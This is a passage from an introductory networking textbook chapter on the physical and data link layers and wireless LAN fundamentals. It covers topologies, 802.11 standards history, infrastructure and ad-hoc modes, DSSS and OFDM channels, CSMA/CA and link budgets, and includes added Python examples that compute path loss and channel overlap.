The purpose of the physical layer is to perform the actual transmission of information across a link. As
such, it covers characteristics that are related to the physical properties and distinctiveness of the
network. This includes the transport medium, topology, data encoding techniques, transmission speeds,
maximum transmission distances, voltage levels, connectors, pin functions, conversion of information
into signals, and synchronization. The physical characteristics that are most important in the context of
this book are the transport medium, the topology, and the data encoding techniques. An overview of
each follows.

Transport Medium
The transport medium defines the type and characteristics of the physical channel that carries
information. In its strictest sense, the channel is used as a tunnel for electricity or electromagnetic
waves. For the purpose of this book, this section makes the distinction between electrical, optical, and
radio channels.
An electrical channel makes use of copper wires to conduct electrons or electricity from source to
destination. An optical channel employs a fiber optic cable to guide light between the emitter and the
receiver. Finally, a radio frequency (RF) channel utilizes the radio band of the electromagnetic spectrum
to carry signals. A key difference of RF is that the RF channel is not bounded or confined to the actual
physical systems but relies on the free space of air.
Indeed, RF is truly unbounded because the ether has no borders. Because RF signals are not guided by a
conduit, they can theoretically propagate in any direction. This borderless characteristic of RF has two
important implications:
External influences have a greater impact on unbounded signals and their properties because the
lack of a conduit implicitly prevents shielding from external influences.
Radio communication is always a broadcast in the sense that any device can tune into the signal.
The broadcast nature of radio communication has important implications for both WLAN technology and
applications. For example, transmissions can inherently be intercepted by any network-attached station.
When combined with nondirectional antennas, every station intercepts every transmission of every other
station. Not only does this have security implications, but it also requires methods for resolving orderly
access to the air. These implications will be covered in greater detail in Chapter 7, "Security and Wireless
LANs."

Topology
The following list describes the four basic topologies for networks consisting of three or more nodes:
Bus: Network nodes are connected to a central transmission channel, that is, the bus or backbone.
Star: Nodes are connected to a central hub.
Ring: Network nodes are connected to one another in the shape of a closed loop.
Mesh: Devices are directly connected by two or more connections to other network nodes.
Figure 1-2 illustrates the different topologies.

Figure 1-2. Network Topologies

By construction, WLANs adopt a bus topology because they use radio as their transmission channel. The
radio spectrum forms the bus, and every node always hears every transmission from every other node.
This is only true for a bus topology. Confusion might arise due to the physical layout of WLANs.
The access point (AP), which acts as a bridge, forwards all data it receives. The impression arises that
WLANs adopt a star topology. However, star topologies provide singular and dedicated connectivity
between the stations and the central hub, which is not the case for WLANs. In WLANs, the transport
medium is shared among all connected stations. Hence, a distinction must be made between the
physical appearance of a star topology and the logical layout and behavior as a bus topology.

Data Encoding
Data encoding is the transformation of information into a form that is suitable for the transmission
medium. Adverse transmission effects such as attenuation, distortion, and interference are taken into
consideration when selecting an encoding method for a particular physical channel.
Attenuation is the loss of signal strength. This can be due to impurities of the transmission medium.
Copper has a natural resistance at room temperature. Similarly, fiber optic cables contain impurities that
reduce signal strength with distance. With regard to radio signals, one cause of loss of signal power is
materials that the signal encounters. The encountered materials cause absorption or reflection resulting
in a reduction of signal strength (see Figure 1-3). For example, water absorption bands are 22, 183, and
323 GHz, and the oxygen absorption regions are 60 and 118 GHz.

Figure 1-3. Attenuation of a Radio Signal

Another cause of attenuation of radio signals is the increasing volumetric spread of the signal as the
distance from the source increases. Incoherent electromagnetic waves (as opposed to coherent
electromagnetic waves such as lasers) lose signal focus as a function of the distance traveled. The loss of
focus corresponds with a loss in power as the power is distributed over a greater area. This effect can
clearly be seen in flashlights. With constant power levels of the source, the beam's footprint increases
and the intensity of the light decreases the farther you are away from the source.
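The spreading loss described above can be put in numbers. The Python code below is an added example, not from the book: it applies the standard free-space path loss model (the Friis formula, which expresses the inverse-square spreading of an unguided wave; the book itself states no formula), then adds constructed, clearly labelled per-obstacle absorption figures to check whether a link closes against an assumed receiver sensitivity. All numeric values in it are illustrative assumptions.

```python
# Added example (not from the book). Free-space path loss quantifies the
# "power distributed over a greater area" effect; the obstacle figures are
# constructed placeholders, not measured values.
import math

SPEED_OF_LIGHT_M_S = 299_792_458.0


def free_space_path_loss_db(distance_m: float, freq_hz: float) -> float:
    """Friis free-space path loss in dB for an isotropic source.

    Doubling the distance quarters the power density, i.e. adds ~6 dB of loss.
    """
    if distance_m <= 0 or freq_hz <= 0:
        raise ValueError("distance and frequency must be positive")
    return (20 * math.log10(distance_m)
            + 20 * math.log10(freq_hz)
            + 20 * math.log10(4 * math.pi / SPEED_OF_LIGHT_M_S))


# Constructed, illustrative absorption per obstacle in dB. Real values depend on
# thickness, moisture content and frequency and must be measured on site.
OBSTACLE_LOSS_DB = {"drywall": 3.0, "glass": 4.0, "brick": 8.0, "concrete": 12.0}


def received_power_dbm(tx_power_dbm: float, distance_m: float, freq_hz: float,
                       obstacles=(), tx_gain_dbi: float = 0.0,
                       rx_gain_dbi: float = 0.0) -> float:
    """Simple link budget: transmit power plus antenna gains minus spreading
    loss minus the absorption of each obstacle the signal passes through."""
    absorption = sum(OBSTACLE_LOSS_DB[o] for o in obstacles)
    return (tx_power_dbm + tx_gain_dbi + rx_gain_dbi
            - free_space_path_loss_db(distance_m, freq_hz) - absorption)


def link_margin_db(rx_power_dbm: float, rx_sensitivity_dbm: float) -> float:
    """Positive margin means the receiver can still decode the signal."""
    return rx_power_dbm - rx_sensitivity_dbm


if __name__ == "__main__":
    f = 2.4e9  # assumed 2.4 GHz channel
    for d in (1, 10, 20, 40):
        print(f"{d:3d} m: FSPL = {free_space_path_loss_db(d, f):6.2f} dB")
    rx = received_power_dbm(20.0, 10.0, f, obstacles=("concrete",))
    print("rx through one concrete wall:", round(rx, 2), "dBm;",
          "margin vs assumed -80 dBm sensitivity:", round(link_margin_db(rx, -80.0), 2), "dB")
```

Running the block shows that each doubling of distance costs roughly 6 dB, while the constructed concrete figure costs 12 dB in one step; the link-margin check is the calculation a site survey performs per cell before placing an AP.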
Distortion is the process of the physical medium influencing frequency components of the original signal
in different ways. The amount of resistance that a physical entity has on a signal medium is partly
determined by the frequency of the signal that passes through it. Different materials affect the RF signal
at different levels. The effect of lead versus glass on a low-frequency signal will be different from the
effect on a high-frequency signal. The result is an undesirable change in the shape of the radio wave, or
distortion of the signal, that increases with transmission distance (see Figure 1-4).

Figure 1-4. Distortion of an RF Signal As It Passes Through Concrete

Note
Common definitions of the frequency band groups are low, high, and ultra-high. Low bands
range from 0 to 30 MHz, high bands from 100 to 300 MHz, and ultra-high bands from 300 MHz
to 3 GHz.

Interference occurs as a result of outside influences. In copper, inductive currents created by external
electromagnetic fields mutate the original signal's character. Sometimes referred to as noise, in RF,
interference is actually the disturbance of one radio signal by another of the same frequency. The
various transposed signals either boost or reduce frequency components of the original signal, leading to
modification of the original signal's profile. Figure 1-5 shows both the single undisturbed RF wave and
the RF wave when another is introduced. The second diagram shows that when the other wave is added,
it "interferes" with the original wave.

Figure 1-5. Interference of an RF Wave by a Second Signal

Data encoding techniques are used to construct a robust, reconstructable signal for the given medium.
The techniques not only define how digital information is encoded into and decoded from respective
electrical, optical, or radio signals, but also provide methods for error detection and correction.

Layer 2: Data Link Layer


The role of the data link layer is to provide reliable transit of data across a physical link. Specifications
define physical addressing, sequencing of frames, flow control, and error notification. Error notification
alerts upper-layer protocols that a transmission error has occurred. Sequencing of data frames reorders
frames that are received out of sequence. Finally, flow control moderates the transmission of data so
that the receiving device is not overwhelmed with more traffic than it can handle at any given time.
IEEE has subdivided the data link layer into two sublayers:
Logical Link Control (LLC)
Media Access Control (MAC)

Figure 1-6 illustrates the IEEE sublayers of the data link layer.

Figure 1-6. OSI Data Link Sublayers

The LLC sublayer manages communications between devices over a single link of a network. LLC is
defined in the IEEE 802.2 specification and supports both connectionless and connection-oriented
services used by higher-layer protocols. IEEE 802.2 defines a number of fields in data link layer frames
that enable multiple higher-layer protocols to share a single physical data link.
The MAC sublayer defines the contention resolution method for access to the physical medium. In
addition, the MAC specification defines MAC addresses that, at the data link layer, uniquely identify
devices.
The combination of Layer 1 and MAC specifications defines the type of LAN network.
WAN standards are typically defined solely by their Layer 1 characteristics. The same is true for cellular
communications standards. For example, a T1/E1 network is defined by its underlying Layer 1 (physical)
network.
Figure 1-7 illustrates the OSI positioning of various common networking standards.

Figure 1-7. OSI Technology Reference Chart

Given the lesser importance of Layers 3 to 7 in the context of this book, a brief overview is provided for
the remaining OSI layers. Consult other books, such as the following, if you would like in-depth coverage
of these respective layers:
Internetworking with TCP/IP, Volume I: Principles, Protocols, and Architecture by Douglas E. Comer
TCP/IP Illustrated, Volume I: The Protocols by W. Richard Stevens

Layer 3: Network Layer


Layer 3 supports network addressing, route selection, congestion control, and packet fragmentation and
reassembly. IP is today's most commonly employed network layer protocol.

Layer 4: Transport Layer


The transport layer manages end-to-end connections over both connection-oriented and connectionless
links. In addition, its specification includes sequencing, flow control, and the capability for error-free
delivery. The Transport Control Protocol (TCP) is an example of a Layer 4 protocol used on the Internet.

Layer 5: Session Layer


The session layer establishes, manages, and terminates communication sessions. Communication
sessions consist of service requests and service responses that occur between applications located in
different network devices. This layer is typically not encountered in today's Internet environment.
However, protocols such as AppleTalk include session layer implementations.

Layer 6: Presentation Layer


The presentation layer ensures that information sent from one system is readable by the receiving
system. It employs coding and conversion schemes to provide common data representation formats and
conversion of character representation formats because systems may adopt different ways of
representing data. Examples of common data representation formats are ASCII and Extended
Binary-Coded Decimal Interchange Code (EBCDIC). Finally, the presentation layer supplies common data
compression (MPEG, JPEG, GIF, TIFF) and common encryption schemes that enable data encrypted at
the source device to be properly deciphered at the destination.

Layer 7: Application Layer


The application layer interacts with software applications that require a communications component. As
such, its functions include defining syntax, identifying communication partners, determining resource
availability, and synchronizing communication.
Some commonly used programs fall outside the scope of the OSI model. For example, Microsoft Internet
Explorer does not fall within the OSI framework. The HTTP agent embedded in Explorer, however, does
form part of the OSI application layer.

A Brief History of WLANs


The value proposition of a network is that it ties together different entities and enables exchange of
information. The network's value is also directly related to its size. The more entities that are connected
and partake in the network, the higher the impact of the network is. For exchange and scaling to occur
in a relevant and orderly manner, the connected entities must use the same language. As such,
standards form an integral component of networks because they enforce order in a potentially very
chaotic world.
A good understanding of the differences between WLAN standards requires some background in Internet
standards as a whole. The Internet is the largest and most extensive network known today. Even though
the Internet does not have an owner in the strict sense of the word, organizations do exist that govern
standards for protocols, addressing, routing, and so on to ensure interoperability and the capability of
end-to-end information exchange.
One of these organizations, and probably the best known, is the Institute of Electrical and Electronics
Engineers (IEEE). This independent group of individuals, backed by companies, administers standards
for a myriad of technologies. For the sake of manageability, technology domains are broken into major
family groups to delimit and facilitate the process of the standards' development by special-purpose
working groups. A sample of technology domains and working groups is listed in Table 1-1.

Table 1-1. Sample of IEEE Working Groups

Technology Domain           Working Group
--------------------------  -------------------------------------------------------
Broadcast Technology        Video Compression (Digital) Measurement (P1486)
                            Video Distribution and Processing (P205)
Components and Materials    Organic and Molecular Transistors and Materials (P1620)
                            Nanotechnology (P1650)
Information Technology      Learning Technology (P1484)
                            Delay and Power Calculation (P1481)
                            Floating-Point Arithmetic (P754)
                            LAN/MAN (P802)
                            Public-Key Cryptography (P1363)
                            Software Engineering Standards
                            Standard Test Interface Language (P1450)
                            Storage Systems (P1244, P1563)
Power Electronics           Electronic Power Subsystems (P1515)
                            Power Electronics Module Interface (P1461)

A widely known group in the internetworking community is the IEEE 802 working group for LAN/MAN
technologies (P802). The P802 sets the standards for physical and data link layer protocols that are used
on the Internet. Some well-known standards established by this group include 802.2 (LLC), 802.3
(Ethernet), and 802.5 (Token Ring). WLANs are covered in the 802.11 standard. As such, it is common
to use the terms 802.11 and WLAN interchangeably when discussing the technology.
WLANs themselves date back to 1990 when the IEEE 802.11 working group first formed the standard.
The standard eventually became ratified in 1997 and specified a communications rate of 1 or 2 Mbps. As
this soon proved to offer insufficient throughput, 1999 saw the birth of a next-generation protocol that
addressed this limitation. This led to the 802.11b standard, which defines throughput speeds of up to 11
Mbps.
Ever-increasing demand for throughput prompted the IEEE to extend the 802.11 family even further. In
1999, the IEEE ratified the 802.11a protocol, which provides up to 54 Mbps of throughput. Most
recently, the 802.11g protocol, which also provides up to 54 Mbps of throughput, was ratified in 2003.
As technology continues to mature and evolve, the process of setting new standards for WLANs remains
an ongoing effort. Today, standards are being developed for WLAN-specific components that cover
security, global compliance, and efficiency.
As WLAN devices began to proliferate in the open market, potential interoperability problems arose. A
group of companies formed the Wi-Fi Alliance in 1999 (originally called the Wireless Ethernet
Compatibility Alliance [WECA]) to mitigate the risk of losing momentum on WLAN adoption because of
these interoperability issues. This loose body of manufacturers brought together major industry players
to form a collective standard while working in parallel to the IEEE. The Alliance's main charter was to
define strict interoperability standards. This would enhance the user experience by guaranteeing the
capability for WLAN devices to work together in a plug-and-play fashion.
Since the late 1990s, WLANs have become one of the leading mobility technologies, with cellular phone
technologies being another. The ability to have access to digital information anytime and anywhere is
acting as the catalyst for the highly accelerated adoption of WLAN mobility technology. The growth trend
of WLANs' install-base is expected to continue well into the first decade of the twenty-first century with
market research firms projecting double-digit compounded annual growth rates (CAGRs). Innovative and
creative ways of leveraging WLAN mobility technology in both the business and personal arena will fuel
continued advancements not only from a technology perspective, but also from an application and
solution viewpoint. Mobility solutions and WLANs are here to stay.

How Wireless Networks Function


Like any other networking technology, a WLAN possesses a number of basic components and
characteristics. The most distinctive trait is that WLANs utilize radio channels as the physical transport
medium. This same basic radio technology, albeit in different frequency bands, is used by FM radio
stations to distribute audio content. The channels are slices of the radio spectrum that a
transmitter/receiver uses to send/receive a signal.
The fact that radio channels are employed as the transport medium has a specific set of implications.
This section discusses not only the components and characteristics, but also the implications of RF as a
transport medium. More precisely, you learn about the two different WLAN operating modes: ad-hoc and
infrastructure (also known as the base station model). The implications of fading, interference, and noise
are touched upon. Furthermore, techniques for efficient use of RF spectrum such as multiplex, duplex,
and multiple access technology in addition to the contention resolution mechanisms for acquiring an air
channel are covered. Finally, we close the introduction by providing a high-level overview of the
differences among current WLAN standards.

WLAN Modes
WLANs operate in two modes: ad-hoc and infrastructure. The modes define how the stations are related
to one another and how orderly communication takes place. The following sections contrast ad-hoc and
infrastructure modes in more detail.

Ad-Hoc Mode
The ad-hoc WLAN network is an unplanned, unmanaged peer-to-peer relationship. All nodes are
equivalents and can directly communicate with other nodes in their vicinity. They do not need to pass
through a central point of control. An ad-hoc network thus forms a fully meshed network that uses radio
as the interconnection system.
The network is a logical mesh. As mentioned earlier, WLANs physically adopt a bus topology with the
ether forming the backbone. This mesh should be thought of as a logical communications overlay. Figure
1-8 illustrates this any-to-any relationship. The dotted lines depict the virtual interconnections that are
created by means of radio links.

Figure 1-8. Ad-Hoc WLAN Peer Relationships

Even though ad-hoc networks are created on the fly and adopt an any-to-any scheme, they still must
share a minimum set of common parameters such as the radio frequency, a common identifier setting,
and (if used) a common encryption method.

Infrastructure Mode
Infrastructure mode is the most common network type used today for enterprise solutions.
Fundamentally, this WLAN mode adopts a client/server model. The "clients" are devices with a WLAN
interface such as PCs, Personal Digital Assistants (PDAs), wireless IP phones, and many others. The
"server" in this case is the AP. Figure 1-9 illustrates the AP client relationship.

Figure 1-9. Infrastructure Mode WLAN

The logical topology versus physical topology differentiation is the same for ad-hoc mode as for
infrastructure mode. Even though Figure 1-9 would lead you to believe that in infrastructure mode,
WLAN adopts a star topology, it is in reality a physically collapsed bus topology. This is because the RF
medium forms a single Layer 2 collision domain. You can consider it to be equivalent to a traditional
coaxial Ethernet network where the electrical wire has been replaced by radio waves. In the perfect
environment, every station hears every transmission from every other station.

Because both Ethernet (802.3) and WLAN (802.11) use a bus topology, it is not surprising that they use
the same technique for determining accessibility to the physical medium. The method employed by
these types of networks is carrier sense multiple access (CSMA). There are, however, some subtle
differences to medium access control with regard to collision handling because of the RF medium.
Collisions occur when two stations inadvertently believe that the medium is available and both start
transmitting at the same time. When frames collide, data is lost. Neither frame is successfully received
and an orderly retransmit is required. Because there is no supervisory point of control, stations must
make up for this by using their own intelligence to secure the medium. Essentially, every station
effectively becomes its own traffic cop to manage the orderly access to the physical medium.
APs in infrastructure mode form the gateway for the client to the rest of the network. Indeed, all
communications must pass through the AP. As such, logical groups of stations are created that share a
gateway. This gateway or AP defines a standalone WLAN cell.

Note
The gateway can be physically implemented by a single or multiple APs.

In infrastructure mode, WLANs are comprised of cells. The technical name for a WLAN cell is Basic
Service Set (BSS). On the air, each BSS is identified by a BSSID, normally the MAC address of the AP radio,
while the network name that clients see, and that is shared by all the cells of one network, is the Service
Set Identifier (SSID). The SSID is the common denominator that logically groups WLAN cells and effectively
segments the ether through the creation of a virtual Layer 2 network. Note that the SSID is sent in the clear
in beacons and probe responses: it names a network but neither authenticates it nor protects it.
The WLAN cells can be extended or virtually combined when several BSS cells are in proximity of each
other. This is known as an Extended Service Set (ESS). The ESS extends the virtual Layer 2 network by
combining multiple BSSs into a singular larger network. Figure 1-10 shows the segmentation into the
logical groups of stations that form BSSs. It also illustrates the combination of multiple BSSs that forms
an ESS.

Figure 1-10. Basic Service Sets (BSS) and Extended Service Sets (ESS)

WLAN Technologies
When reviewing the basic setup of a WLAN, several challenges need to be resolved. These include the
following:
How multiple terminals share the air channel (multiple access technology)
How transmitting stations merge data (multiplexing)
How to share between up- and down-link (duplexing)
How access to the medium is controlled (access algorithm)
To obtain a better grasp of the meaning of these various technologies, the analogy of individuals using
cars to ship goods through a one-way tunnel is useful:

1. Multiple access determines how the cars form a sequence.
2. Multiplexing defines how the goods are loaded into the cars.
3. Duplexing is resolving the problem of two-way traffic through a one-way tunnel.
4. The access algorithm determines when it is safe for a car to enter the tunnel.
Figure 1-11 illustrates the relationship between the technologies and where they are relevant within a
WLAN.

Figure 1-11. WLAN Access Technologies

Multiple Access Technology


In the context of communications technologies, information can be distributed in both space and time.
You can multiplex information using coding, frequency, or time. The respective access methods are as
follows:
Code division multiple access (CDMA) In CDMA, each transmitter is distinguished by the code used to encode its
signal. In this method, time and frequency stay constant. Figure 1-12 shows an example of a CDMA
network.

Figure 1-12. Code Division Multiple Access

Note
There are many encoding methods. Because of their complexity, this book does not cover
all of them. Simply speaking, however, encoding is the manner in which data is
transposed into a digital or analog signal for transmission over a Layer 1 medium.

Frequency division multiple access (FDMA) FDMA assigns transmitters to separate
frequencies. In this case, time and coding are constant. Figure 1-13 shows an FDMA network.

Figure 1-13. Frequency Division Multiple Access

Time division multiple access (TDMA) TDMA assigns transmitters to separate time slots, where
frequency and coding are constant. Figure 1-14 shows a TDMA network.

Figure 1-14. Time Division Multiple Access

Multiplex Technology
Transmitting stations use multiplex technology to merge data onto the air channel. Similar to access
technology, multiplexing can be done along code, frequency, and time dimensions.
In the case of WLAN technologies, an RF signal is sent using one of three modulation types:
Frequency Hopping Spread Spectrum (FHSS)
Direct Sequence Spread Spectrum (DSSS)
Orthogonal Frequency Division Multiplexing (OFDM)
FHSS is an obsolete technology and is not employed in any of today's WLAN implementations. As such,
we will look at DSSS and OFDM only.

DSSS
DSSS is an older and simpler to implement, and hence more economical, method for RF modulation.
Signals are transmitted on a low-amplitude carrier wave (RF) across a wide band. This is done to combat
narrowband interference. DSSS defines a channel-to-channel separation of 5 MHz. However, each channel is 22 MHz
in width (11 MHz to the left and 11 MHz to the right of the center frequency). Because of this spreading,
adjacent channels overlap, which inherently causes channel-to-channel interference.
There are only three channels in DSSS multiplexing that do not overlap with each other. These are
referred to as the transmit or non-overlapping channels and consist of channels 1, 6, and 11.
Figure 1-15 represents the 2.4 GHz Industrial, Scientific and Medical (ISM) band. Both IEEE 802.11b and
IEEE 802.11g operate in this band, specifically between 2.4 GHz and 2.4835 GHz.

Figure 1-15. Industrial, Scientific and Medical (ISM) Band
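The channel arithmetic above can be checked directly. The following Python script is an added illustration and is not part of the book's text: it places each 2.4-GHz channel at its standard center frequency (channel 1 at 2412 MHz, 5 MHz per step, the Japan-only channel 14 at 2484 MHz), treats every channel as 22 MHz wide, and searches for the largest set of mutually non-overlapping channels. For the 11 channels permitted in the United States it finds channels 1, 6, and 11; run over all 14 channels it also shows why channel 14 fits alongside them. Channel numbering and widths are the standard values; the brute-force search is this example's own choice.

```python
"""Which 2.4 GHz DSSS channels overlap? Constructed example, not from the book.

Channel n (1 to 13) is centred at 2412 + 5 * (n - 1) MHz; channel 14 (Japan only)
sits at 2484 MHz. A DSSS channel occupies 22 MHz, so two channels overlap unless
their centres are at least 22 MHz (five channel numbers) apart.
"""
from itertools import combinations

CHANNEL_WIDTH_MHZ = 22


def centre_mhz(channel):
    """Centre frequency in MHz of an 802.11b/g channel."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2412 + 5 * (channel - 1)
    raise ValueError(f"no such 2.4 GHz channel: {channel}")


def overlaps(a, b):
    """True if the 22 MHz wide channels a and b share any spectrum."""
    return abs(centre_mhz(a) - centre_mhz(b)) < CHANNEL_WIDTH_MHZ


def overlap_matrix(channels):
    """Map each channel to the set of other channels it interferes with."""
    channels = list(channels)
    return {c: {d for d in channels if d != c and overlaps(c, d)} for c in channels}


def largest_non_overlapping_set(channels):
    """Largest set of mutually non-overlapping channels, found by brute force.

    With at most 14 channels there are only 2**14 subsets, so an exhaustive
    search is cheap. The lowest-numbered winning set is returned.
    """
    channels = sorted(channels)
    for size in range(len(channels), 0, -1):
        for subset in combinations(channels, size):
            if all(not overlaps(a, b) for a, b in combinations(subset, 2)):
                return subset
    return ()


if __name__ == "__main__":
    us_channels = range(1, 12)          # FCC domain: channels 1 to 11
    for channel, clashes in overlap_matrix(us_channels).items():
        print(f"channel {channel:2d} ({centre_mhz(channel)} MHz) overlaps {sorted(clashes)}")
    print("largest non-overlapping set (1-11):", largest_non_overlapping_set(us_channels))
    print("largest non-overlapping set (1-14):", largest_non_overlapping_set(range(1, 15)))
```

The same overlap test is what a site survey applies when it checks that neighboring APs, including any rogue or neighbor-owned ones, have not been placed on channels that collide.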



OFDM
OFDM is more complex to implement because it packs many narrow, precisely spaced subcarriers into each
channel. At 20 MHz, the OFDM channel-to-channel separation is wider than the 5-MHz separation of DSSS,
and OFDM channels do not overlap one another. This precise channel spacing is key to the improved data
rates that are possible with OFDM multiplexing. To obtain an even higher data rate, each of the eight
transmit channels is further divided into 52 subcarriers (48 carry data and 4 are pilots used for
synchronization), which are transmitted in parallel. As a result, more data can be encoded in the same
channel time.
Figure 1-16 shows the 5-GHz Unlicensed National Information Infrastructure (UNII) band. 802.11a
operates in this band, specifically those frequencies between 5.15 GHz and 5.350 GHz.

Figure 1-16. Unlicensed National Information Infrastructure (UNII) Band



Duplex Technology
Duplex technology is used to share the same space for an uplink and downlink. Two kinds of duplex
technology are relevant to WLANs:

Time division duplex In time division duplexing (TDD), uplink and downlink share the same frequency and
take turns in time. 802.11 works this way: a WLAN radio is half-duplex, and the AP and its clients
alternate on one channel.
Frequency division duplex In frequency division duplexing (FDD), uplink and downlink use separate
frequency bands, so both directions can transmit at the same time. Cellular systems commonly use FDD;
802.11 WLANs do not.

Access Technology
Access technology defines which WLAN node can take control of the RF spectrum and how. Although
similar to the access method in other IEEE 802 standards, WLANs employ carrier sense multiple
access/collision avoidance (CSMA/CA) rather than the collision detection (CSMA/CD) of wired Ethernet.
The defining feature in WLAN is collision avoidance. WLANs use open air, which is borderless, as opposed
to other IEEE 802 forms where the transport medium is bounded. A WLAN radio cannot transmit and listen
at the same time, and two clients that both hear the AP might not hear each other, so detecting a
collision while it happens is nearly impossible. Stations counter this problem by listening for an idle
medium, waiting a random backoff before transmitting, and treating a missing acknowledgement from the
receiver as the sign that the frame was lost and must be retransmitted; hence the name collision avoidance.

WLAN Radio Communications


This section describes the role and framework of WLAN radio frequencies. WLANs have two specific slices
of the RF spectrum: 2.4 GHz and 5 GHz. These frequency bands are unlicensed bands that can be used
freely without registration or financial obligation.
With their increasing popularity, the use of vast amounts of WLAN devices in these bands has changed
access to the airspace from free into a free-for-all. Because the spectrum is unlicensed, no operator
coordinates who transmits where, and the possibility of an excessive number of devices in each other's
vicinity exists. Indeed, the compounding of the RF
interference problem in combination with the massive contention for access to the ether can saturate the
frequency range to a point where no successful communication is possible. In this case, the system
simply "collapses." This adverse situation must therefore be preempted and addressed.

Characteristics That Influence WLAN Bandwidth


Various characteristics that are specific to a WLAN can influence the actual throughput that can be
achieved. These elements include the modulation technique used, the power of the radio signal, and
environmental effects such as attenuation and multipath effects. Each will now be discussed in more
detail.

Modulation
Modulation is the process of overlaying a content signal on a carrier signal. The overlaying can be done
in terms of amplitude, frequency, or phase. Generally there are three forms of digital modulation:
Amplitude shift keying A change in the strength (amplitude) of the RF signal signals a binary flip.
Frequency shift keying A shift of the carrier to a different frequency signals a binary flip.
Phase shift keying An offset of the phase, or timing, of the radio wave signals a binary flip.
As a rule, the more distinct states a modulation scheme encodes per symbol, the higher the data rate,
but the cleaner the received signal must be to tell those states apart. This is why data rates fall as
signal quality drops.

Path Loss, Power, and Antennas


In a perfect environment, the distance that an RF wave will travel is dependent on its frequency and
amplitude. However, in a real-world deployment, physical variables such as walls and people have a
further impact on path loss. Whether a signal arrives with enough strength to be decoded is determined
by the link budget, which includes the following:
Transmitter power The amount of power that the station uses to transmit a signal, measured in mW or
dBm.
Transmitter and receiver antenna gain A measurement of the increase in the radio signal provided by
the antenna, measured in dB or dBi.
Transmitter and receiver cable losses The loss of signal strength (attenuation) that occurs as a
signal passes through a length of coaxial cable or a connector.
Receiver sensitivity The weakest signal level at which the receiver can still correctly decode a frame at
a given data rate, measured in dBm. Each step up in data rate requires a stronger received signal.
Noise and interference Other RF signals that exist in the area of an AP or client and that
adversely influence the original signal.

Note
The decibel (dB) is not a unit in the sense that a meter or an ampere is. Feet and
amperes are defined quantities of distance and electrical current. A decibel is a
relationship between two values of power. A decibel (dB) is defined as follows:

A decibel intends to facilitate the comparison of power levels that are orders of magnitude
different. In the context of radio signals, the decibel expresses gains and losses along the path, the
signal-to-noise ratio, and, when referenced to one milliwatt (dBm), an absolute power level.

Power and antenna gain have the most direct effect on signal amplitude. Within the standards for each
protocol, as governed by regional regulatory bodies, there are defined limits on the transmit power and
antenna use. These limitations directly influence the maximum reach of WLANs.
Generally speaking, antenna gain is measured in dBi (isotropic), which is based on a "theoretical
antenna." This provides a constant baseline.

Note
An isotropic antenna is a theoretical concept. If it existed, the signal would radiate equally in all
directions from the antenna, forming a perfect sphere.
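To make the link budget concrete, the following Python script is added here as an illustration; it is not from the book. It converts milliwatts to dBm, expresses the decibel as the ratio of two powers, estimates free-space path loss from distance and frequency, and then walks the signal from transmitter to receiver by adding every gain and subtracting every loss, ending with the margin above receiver sensitivity. The transmit power, antenna gains, cable loss, distance, and -82 dBm sensitivity in example_link() are assumed figures chosen for illustration; real deployments add wall and body attenuation on top of free-space loss.

```python
"""Link budget in dB, dBm and dBi. Constructed example, not from the book.

Every figure in example_link() is an assumption chosen for illustration.
"""
import math


def mw_to_dbm(milliwatts):
    """Absolute power relative to 1 mW: 0 dBm is 1 mW, 20 dBm is 100 mW."""
    return 10 * math.log10(milliwatts)


def dbm_to_mw(dbm):
    """Inverse of mw_to_dbm."""
    return 10 ** (dbm / 10)


def ratio_db(power_1, power_2):
    """The decibel as a ratio of two powers: 10 log10(P1 / P2)."""
    return 10 * math.log10(power_1 / power_2)


def free_space_path_loss_db(distance_m, freq_mhz):
    """Friis free-space loss between isotropic antennas, in dB.

    Walls, furniture and people add further attenuation on top of this.
    """
    return 20 * math.log10(distance_m) + 20 * math.log10(freq_mhz) - 27.55


def received_power_dbm(tx_dbm, tx_gain_dbi, tx_cable_db, path_loss_db,
                       rx_gain_dbi, rx_cable_db):
    """Walk the signal from transmitter to receiver: add gains, subtract losses.

    Antenna gains are in dBi (relative to an isotropic antenna); cable and
    path losses in dB; the result, like the input power, is in dBm.
    """
    return (tx_dbm + tx_gain_dbi - tx_cable_db
            - path_loss_db
            + rx_gain_dbi - rx_cable_db)


def link_margin_db(rx_dbm, sensitivity_dbm):
    """Margin above receiver sensitivity (a dBm figure). Negative means no link."""
    return rx_dbm - sensitivity_dbm


def example_link():
    """Assumed scenario: 100 mW AP with a 2.2 dBi antenna and 0.5 dB of cable
    loss, 100 m line of sight on channel 6 (2437 MHz), client with a 2.2 dBi
    antenna and no cable, rated at -82 dBm sensitivity for 11 Mbps."""
    path_loss = free_space_path_loss_db(100, 2437)
    rx = received_power_dbm(mw_to_dbm(100), 2.2, 0.5, path_loss, 2.2, 0.0)
    return {
        "path_loss_db": path_loss,
        "rx_dbm": rx,
        "margin_db": link_margin_db(rx, -82),
    }


if __name__ == "__main__":
    for name, value in example_link().items():
        print(f"{name:14s} {value:7.2f}")
```

Because every term is in decibels, the budget is a plain sum; doubling the transmit power adds only 3 dB, which is why a larger antenna or a shorter cable run often buys more range than a more powerful radio, and why the regulatory power limits discussed next are expressed as an EIRP figure that already includes antenna gain.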

Attenuation, Distortion, and Interference


Another important aspect in WLANs is the environment and how it affects radio waves. Because a myriad
of environmental elements influence a radio wave, the wave's actual behavior is exceedingly hard to
predict deterministically. For example, RF absorption by objects reduces the strength of the signal. In a
crowded office, radio transmissions are dampened as they pass through walls, desks, and even people.
This is not the case in an open warehouse. Similarly, a functioning microwave oven emits radio waves
that might interfere with WLAN signals, especially when in close proximity to any WLAN device.

Multipath
Radio waves have no boundaries and "bounce" around. This causes an effect known as multipath. The
reflection of waves causes them to be received not only multiple times by stations but also at different
intervals. Radio receivers need to be able to extract the correct signal from these disparate ones and
ferret out the good from the bad.
Figure 1-17 illustrates how the ricochet effect of radio waves off objects leads to the multipath effect.
Several signals with the same data are sent from the AP into free space, which then "ricochet" in many
different directions off different walls (boundaries). The client receives each signal at different times.

Figure 1-17. Multipath Effect

WLAN device manufacturers integrate specific components into their products to deal with multipath.
This is implemented in both hardware and software.

Special or customized antennas can also be used to combat the adverse effect of multipath. Directional
antennas focus signals and hence counteract the general effects of multipath. Additionally, the radio
receiver can accommodate multipath by reacting to "delay spread" and rejecting duplicates of already
received signals.

Combating External Effects


All the negative impacts discussed thus far have a direct influence on the relative throughput of a WLAN.
For a WLAN to be able to send data, it must accommodate changes incurred from these detrimental
factors.
To effectively cope with all the adverse external effects, WLANs have adopted a self-throttling
